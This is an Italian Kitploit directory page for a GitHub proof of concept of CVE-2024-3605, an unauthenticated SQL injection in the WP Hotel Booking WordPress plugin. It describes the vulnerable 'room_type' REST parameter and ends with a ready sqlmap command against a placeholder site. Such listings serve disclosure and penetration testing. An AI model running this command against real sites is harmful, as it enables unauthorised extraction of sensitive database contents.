Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-3605 — WP Hotel Booking <= 2.1.0 - SQL Injection non autenticata | Kitploit
Strumenti/GitHubGitHub/randomrobbiebf/cve-2024-3605
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniSicurezza WebPenetration Testing
GitHubrandomrobbiebf/cve-2024-3605

CVE-2024-3605

WP Hotel Booking <= 2.1.0 - SQL Injection non autenticata

Vedi Repository
1 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-3605

WP Hotel Booking <= 2.1.0 - SQL Injection non autenticata

Descrizione

Il plugin WP Hotel Booking per WordPress è vulnerabile a SQL Injection tramite il parametro 'room_type' dell'endpoint API REST /wphb/v1/rooms/search-rooms in tutte le versioni fino alla 2.1.0 inclusa, a causa di una insufficiente escape del parametro fornito dall'utente e della mancanza di una preparazione adeguata della query SQL esistente. Ciò consente ad attaccanti non autenticati di aggiungere query SQL supplementari a quelle già esistenti, che possono essere utilizzate per estrarre informazioni sensibili dal database.

Dettagli

  • Tipo: plugin
  • Slug: wp-hotel-booking
  • Versione interessata: 2.1.0
  • Punteggio CVSS: 10
  • Valutazione CVSS: Critico
  • CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
  • CVE: CVE-2024-3605
  • Stato: Attivo

POC

sqlmap -u 'https://www.target.com/wp-json/wphb/v1/rooms/search-rooms?check_in_date=2025-01-01&check_out_date=2025-01-10&adults=4&max_child=0&paged=1&room_type=standard' --dbms='MySQL ' --random-agent

Scarica lo strumento